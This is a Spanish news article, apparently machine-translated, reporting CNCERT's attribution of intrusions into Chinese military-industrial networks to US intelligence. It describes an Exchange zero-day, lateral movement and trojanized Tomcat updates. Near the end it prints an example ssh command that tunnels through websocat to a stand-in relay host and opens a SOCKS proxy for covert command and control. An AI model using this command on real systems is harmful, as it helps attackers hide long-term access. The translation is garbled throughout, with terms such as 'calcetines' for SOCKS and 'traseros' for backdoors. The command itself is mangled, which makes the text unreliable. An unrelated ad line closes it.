Desde mediados de 2022, las redes militares-industriales chinas han sido el objetivo de intrusiones cibernéticas altamente sofisticadas atribuidas a las agencias de inteligencia estadounidenses.
Estas campañas explotaron vulnerabilidades previamente desconocidas para instalar malware sigiloso, mantener un acceso prolongado y exfiltrar datos de defensa confidenciales.
Inicialmente identificado después de una violación de la NSA en la Northwestern Politechnical University, los últimos incidentes descubiertos por CNCERT ilustran un enfoque implacable en los establecimientos de fabricación e investigación de defensa de China.
Al emerger en julio de 2022, la familia principal de malware explotó un defecto de día cero en los servidores de intercambio de Microsoft. Los atacantes violaron un sistema de correo electrónico dentro de un importante contratista militar y establecieron persistencia durante casi un año.
Al aprovechar un controlador de dominio interno como trampolín, el equipo de intrusos realizó un movimiento lateral para comprometer más de cincuenta hosts principales.
Los analistas de CNCERT señalaron que los operadores desplegaron cargas útiles ofuscadas, túneladas a través de sesiones SSH eliminadas por WebSocket y enrutaron el tráfico a través de nodos de retransmisión en Alemania y Finlandia para evadir el monitoreo de la red.
En una segunda ola entre julio y noviembre de 2024, los adversarios se dirigieron a una vulnerabilidad electrónica del sistema de archivos en más de 300 dispositivos en el entorno de producción de un proveedor.
A través de direcciones IP rumanas y holandesas comprometidas, manipularon filtros de servicio Tomcat para implantar paquetes de actualización troyanizados.
Estos troyanos a medida ejecutaron búsquedas de palabras clave para “trabajo secreto” y “red central”, que cosechan diagramas arquitectónicos propietarios y especificaciones de protocolo.
Investigadores de CNCERT identificado Las técnicas de sigilo de esta campaña, incluida la limpieza dinámica de registro y el reconocimiento activo de los sistemas de detección de intrusos específicos de defensa.
Después de estas revelaciones, las conversaciones recientes entre la administración del ciberespacio de China y Nvidia subrayaron la importancia crítica de la seguridad de la cadena de suministro.
Las autoridades enfatizaron los riesgos de dependencia de los componentes de hardware y software de origen extranjero que pueden transportar traseros preinstalados.
Tácticas encubiertas de canal y persistencia
Una característica definitoria de las intrusiones basadas en el intercambio es el canal SSH Coverts sobre el canal encubierto SSH. Después de un punto de apoyo inicial, los operadores ejecutaron un demonio SSH de espacio de usuario disfrazado de un servicio de mensajería.
El demonio escucha en el puerto 80 para las solicitudes de apretón de manos de WebSocket. Una vez establecidas, las cargas útiles cifradas atraviesan este túnel, permitiendo el comando y el control bidireccionales sin activar alertas típicas de SSH o HTTPS. Un ejemplo simplificado de la configuración del oyente podría parecerse:
ssh -o proxyCommand = “WebSocat ws-connect: //relay.example.net: 443” \ -n -d localhost: 1080 -i /path/to/obf_key.pem
Este comando gira un proxy de calcetines en el host comprometido, canalizando todo el tráfico a través de un relé remoto. Al ofuscar SSH dentro de los marcos de WebSocket estándar, los atacantes mantuvieron acceso encubierto a largo plazo a redes críticas de misión sin detección.
Integre cualquiera. Pruebe 50 búsquedas de prueba gratuitas
